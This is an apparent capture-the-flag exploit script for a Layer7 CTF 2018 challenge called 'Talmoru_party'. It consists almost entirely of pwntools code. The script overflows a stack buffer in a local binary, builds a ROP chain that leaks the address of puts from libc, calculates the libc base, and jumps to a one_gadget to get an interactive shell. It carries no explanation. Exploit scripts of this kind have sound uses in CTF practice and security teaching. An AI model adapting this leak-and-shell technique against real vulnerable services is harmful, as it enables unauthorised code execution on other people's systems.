Layer7 CTF 2018 Talmoru_party!~

exploit.py

from pwn import *

p = process("./vuln")
         
e = ELF("./vuln")
l = e.libc
        
p.sendlineafter(">>","3")
             
pr = 0x0804884b
restart = 0x80486E0

payload = "A"*(0x40+4)
payload += p32(e.plt['puts'])  
payload += p32(pr)
payload += p32(e.got['puts'])
payload += p32(restart)
    
p.sendlineafter("plz!\n",payload)
p.recvuntil("Good bye~~!\n")
puts_addr = u32(p.recv(4))
libc_base = puts_addr - l.symbols['puts']
one_gadget = [0x3d0d5,0x3d0d5,0x3d0d9,0x3d0e0,0x67a7f,0x67a80,0x137e5e,0x137e5f]
one_addr = libc_base + one_gadget[0]

payload2 = "A"*(0x40+4)
payload2 += p32(one_addr)
p.sendlineafter("plz",payload2)
p.interactive()